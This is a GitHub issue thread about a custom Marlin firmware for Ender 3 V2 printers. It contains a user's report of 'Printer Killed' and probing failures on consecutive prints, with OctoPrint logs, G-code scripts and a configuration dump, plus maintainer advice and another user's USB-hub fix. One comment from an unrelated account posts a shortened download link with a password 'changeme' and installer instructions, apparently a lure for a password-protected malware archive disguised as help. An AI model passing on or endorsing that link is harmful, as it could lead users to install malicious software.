mriscoc/Ender3V2S1 #1345: Printer killed - robbing

boboxx, 2024-08-27:
### Did you test with a precompiled firmware?

Yes, and the problem still exists.

### Bug Description

Everytime I try to do 2 prints back to back after another I always get a "Printer Killed! M112 Shutdown" and probing fail on the second print and stops the print. I have to reboot the printer and start the print again.

This is what OctoPrint is reporting:
Recv: echo:busy: processing
Recv: Probing mesh point 16/25.
Recv:  T:140.00 /140.00 B:84.99 /85.00 @:18 B@:71
Recv: echo:busy: processing
Recv: Probing mesh point 17/25.
Recv:  T:140.01 /140.00 B:85.00 /85.00 @:18 B@:72
Recv: echo:busy: processing
Recv: Probing mesh point 18/25.
Recv:  T:140.06 /140.00 B:85.00 /85.00 @:17 B@:72
Recv: echo:busy: processing
Recv: Probing mesh point 19/25.
Recv:  T:140.07 /140.00 B:85.01 /85.00 @:17 B@:72
Recv: echo:busy: processing
Recv:  T:140.08 /140.00 B:85.04 /85.00 @:17 B@:68
Recv: echo:busy: processing
Recv: Probing mesh point 20/25.
Recv:  T:140.05 /140.00 B:85.06 /85.00 @:17 B@:64
Recv: echo:busy: processing
Recv: Error:Probing Failed
Changing monitoring state from "Printing" to "Error"

This is my end gcode:
{if max_layer_z < printable_height}G1 Z{z_offset+min(max_layer_z+2, printable_height)} F600 ; Move print head up{endif}
G1 X5 Y{print_bed_max[1]*0.8} F{travel_speed*60} ; present print
{if max_layer_z < printable_height-10}G1 Z{z_offset+min(max_layer_z+70, printable_height-10)} F600 ; Move print head further up{endif}
{if max_layer_z < max_print_height*0.6}G1 Z{printable_height*0.6} F600 ; Move print head further up{endif}
M140 S0 ; turn off heatbed
M104 S0 ; turn off temperature
M107 ; turn off fan

This is my printer config (Ender3V2 +Sprite Extruder and a CR touch)
Send: M503
Recv: echo:; Linear Units:
Recv: echo:  G21 ; (mm)
Recv: echo:; Temperature Units:
Recv: echo:  M149 C ; Units in Celsius
Recv: echo:; Filament settings (Disabled):
Recv: echo:  M200 S0 D1.75
Recv: echo:; Steps per unit:
Recv: echo:  M92 X80.00 Y80.00 Z400.00 E424.90
Recv: echo:; Max feedrates (units/s):
Recv: echo:  M203 X500.00 Y500.00 Z10.00 E45.00
Recv: echo:; Max Acceleration (units/s2):
Recv: echo:  M201 X500.00 Y500.00 Z100.00 E1000.00
Recv: echo:; Acceleration (units/s2) (P<print-accel> R<retract-accel> T<travel-accel>):
Recv: echo:  M204 P250.00 R800.00 T1250.00
Recv: echo:; Advanced (B<min_segment_time_us> S<min_feedrate> T<min_travel_feedrate> X<max_jerk> Y<max_jerk> Z<max_jerk> E<max_jerk>):
Recv: echo:  M205 B20000.00 S0.00 T0.00 X8.00 Y8.00 Z0.40 E5.00
Recv: echo:; Unified Bed Leveling:
Recv: echo:  M420 S0 Z10.00 ; Leveling OFF
Recv: 
Recv: Unified Bed Leveling System v1.01 inactive
Recv: echo:Active Mesh Slot 0
Recv: echo:EEPROM can hold 5 meshes.
Recv: 
Recv: echo:; Material heatup parameters:
Recv: echo:  M145 S0 H195.00 B60.00 F128
Recv: echo:  M145 S1 H240.00 B90.00 F128
Recv: echo:  M145 S2 H245.00 B80.00 F128
Recv: echo:  M145 S3 H190.00 B50.00 F128
Recv: echo:; Bed PID:
Recv: echo:  M304 P133.37 I25.26 D469.46
Recv: echo:; Display Sleep:
Recv: echo:  M255 S5 ; (minutes)
Recv: echo:; LCD Brightness:
Recv: echo:  M256 B127
Recv: echo:; Power-loss recovery:
Recv: echo:  M413 S0 ; OFF
Recv: echo:; Retract (S<length> F<feedrate> Z<lift>):
Recv: echo:  M207 S5.00 W13.00 F2400.00 Z0.20
Recv: echo:; Recover (S<length> F<feedrate>):
Recv: echo:  M208 S0.00 W0.00 F2400.00
Recv: echo:; Z-Probe Offset:
Recv: echo:  M851 X-20.00 Y-40.00 Z-5.16 ; (mm)
Recv: echo:; Hotend Idle Timeout:
Recv:   M86 B0 E0 S600 T170
Recv: echo:; Linear Advance:
Recv: echo:  M900 K0.00
Recv: echo:; Filament load/unload:
Recv: echo:  M603 L0.00 U100.00 ; (mm)
Recv: echo:; Filament runout sensor:
Recv: echo:  M412 S0 D25.00 ; Sensor OFF
Recv: echo:; Model predictive control:
Recv: echo:  M306 E0 P40.00 C14.40 R0.2187 A0.1257 F0.1315 H0.0056
Recv: echo:; Physical minimums:
Recv: echo:  C100 X0 Y0
Recv: echo:; Physical maximums:
Recv: echo:  C101 X230 Y230 Z250
Recv: echo:; Bed size:
Recv: echo:  C102 X230 Y230
Recv: echo:; Mesh inset and leveling settings:
Recv: echo:  C29 L25 R185 F25 B189 X5 Y5 T50 V1 ; 5x5 T=50 C
Recv: echo:; Max Extruder temperature:
Recv: echo:  C104 T275
Recv: echo:; Park Head:
Recv: echo:  C125 X230 Y221 Z20
Recv: echo:; Filament runout sensor:
Recv: echo:  C412 M0 ; Active mode: LOW
Recv: echo:; Invert Extruder:
Recv: echo:  C562 E0 ; No inverted
Recv: echo:; Probe Z Fix, Speed and Multiple Probing:
Recv: echo:  C851 F0.00000 S480 M0
Recv: ok P15 B15

Full M115
Recv: FIRMWARE_NAME:Marlin 2.1.3 MRiscoC Ender3V2S1-427-BLT, based on bugfix-2.1.x (Aug 26 2024 08:49:47) SOURCE_CODE_URL:github.com/mriscoc/Ender3V2S1 PROTOCOL_VERSION:1.0 MACHINE_TYPE:Ender3V2S1 EXTRUDER_COUNT:1 UUID:cede2a2f-41a2-4748-9b12-c55c62f367ff
Recv: Cap:SERIAL_XON_XOFF:0
Recv: Cap:BINARY_FILE_TRANSFER:1
Recv: Cap:EEPROM:1
Recv: Cap:VOLUMETRIC:1
Recv: Cap:AUTOREPORT_POS:0
Recv: Cap:AUTOREPORT_TEMP:1
Recv: Cap:PROGRESS:0
Recv: Cap:PRINT_JOB:1
Recv: Cap:AUTOLEVEL:1
Recv: Cap:RUNOUT:1
Recv: Cap:Z_PROBE:1
Recv: Cap:LEVELING_DATA:1
Recv: Cap:BUILD_PERCENT:1
Recv: Cap:SOFTWARE_POWER:0
Recv: Cap:TOGGLE_LIGHTS:0
Recv: Cap:CASE_LIGHT_BRIGHTNESS:0
Recv: Cap:EMERGENCY_PARSER:1
Recv: Cap:HOST_ACTION_COMMANDS:1
Recv: Cap:PROMPT_SUPPORT:1
Recv: Cap:SDCARD:1
Recv: Cap:MULTI_VOLUME:0
Recv: Cap:REPEAT:0
Recv: Cap:SD_WRITE:1
Recv: Cap:AUTOREPORT_SD_STATUS:0
Recv: Cap:LONG_FILENAME:1
Recv: Cap:LFN_WRITE:1
Recv: Cap:CUSTOM_FIRMWARE_UPLOAD:1
Recv: Cap:EXTENDED_M20:1
Recv: Cap:THERMAL_PROTECTION:1
Recv: Cap:MOTION_MODES:0
Recv: Cap:ARCS:1
Recv: Cap:BABYSTEPPING:1
Recv: Cap:EP_BABYSTEP:0
Recv: Cap:CHAMBER_TEMPERATURE:0
Recv: Cap:COOLER_TEMPERATURE:0
Recv: Cap:MEATPACK:0
Recv: Cap:CONFIG_EXPORT:0
Recv: Cap:PROUI_AML:1
Recv: area:{full:{min:{x:0.00,y:0.00,z:0.00},max:{x:220.00,y:230.00,z:250.00}},work:{min:{x:0.00,y:0.00,z:0.00},max:{x:220.00,y:230.00,z:250.00}}}
Recv: ok P15 B15
Recv:  T:33.25 /0.00 B:40.84 /0.00 @:0 B@:0
Send: M155 S2
Recv: ok P15 B15
Send: M876 P1
Recv: ok P15 B15

I'm using OrcaSlicer version 2.1.1

Anyone know what the issue could be? Once that happens the printer stops responding and can't send any other command.

### Version of Professional Firmware

Marlin 2.1.3 MRiscoC Ender3V2S1-427-BLT

### Printer model

Ender3V2 +Sprite Extruder and a CR touch

### Electronics

4.2.7

### Bed Leveling

ABL Bilinear mesh

### Your Slicer

Other (explain below)

### Host Software

OctoPrint

boboxx, 2024-08-27:
I'm using G29 P1 for bed levelling

I'm also including my start script:

M117 Heating... ;Put printing message on LCD screen
M300 S2500 P100; Beep

M104 S140 ; set extruder temp
M140 S[first_layer_bed_temperature] ; set bed temp

;G1 Z50 ; this is a good start heating position
G28 X Y; Home X Y
G1 Y10 ; this is a good start heating position
M84 ; disable motors

M300 S2500 P100; Beep
M117 wait for extruder temp... ;Put message on LCD screen
M109 S140; wait for extruder temp

M300 S2500 P100; Beep
M117 Mesh leveling... ;Put message on LCD screen
G29 P1 ; Home automatically and run mesh leveling on every print

C108 ; Close the mesh viewer (optional)
M300 S2500 P100; Beep

M104 S[first_layer_temperature] ; set extruder temp

; Start of print
G21; metric values
G90 ; absolute positioning
M83 ; use relative distances for extrusion

; You may want to adjust the X and Y here so the nozzle is really above the bed!
G1 X0 Y0 F7200 ; Move to a position in the left front of the bed
G1 Z0.6; Move nozzle above 0.6 mm of the bed
G91 ; Use relative mode

M109 S[first_layer_temperature] ; wait for extruder temp
M190 S[first_layer_bed_temperature] ; wait for bed temp

; now print a line of filament to prepare extrusion
G1 F1800 E3
G1 Y40 E20 F1000 ; prints a line in the front
G1 Y40 E20 F800 ; prints a line in the front

; Done with the dancing :)
G92 E0 ; Set extrusion distance to 0
G90 ; switch back to absolute mode

M117 Printing... ;Put message on LCD screen
; Start of actual GCode for the print

YeGop0218, 2024-08-27:
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

mriscoc, 2024-08-30:
Try disabling HS mode.
Avoid M115 kill messages by following the Octoprint wiki guide: https://github.com/mriscoc/Ender3V2S1/wiki/Octoprint

dmitche3, 2024-09-12:
I’m having an issue with DCing. I’ve had no problems until I installed the recompile (latest) for my Ender 3v2 TCL?  
I can print through Ponterface for 3-4 hours when I get the printer killed and my serial port is nonresponsive. I’ve tried different cables, removing the hub, different baud rates but it still is happening. 
possibly related, if I do a M501(M503 I forget which one) to show my settings at the end it mentions a serial interface error and my serial port is locked up. 
Sorry. My first time posting on this site.

dmitche3, 2024-12-28:
My problem with disconnecting was solved and not related to anything. One day my Dell laptop wouldn’t boot. Blue screens of death after I added a string of lights to the USB hub. It was drawing too much current and the PC actually wouldn’t even boot.  
i replaced my hub with an AC powered hub and so long as i remember to turn on the port from PC to printer no problems.  
This was a new experience for me having built PCs since 1989.

closed 2025-03-11 by github-actions[bot]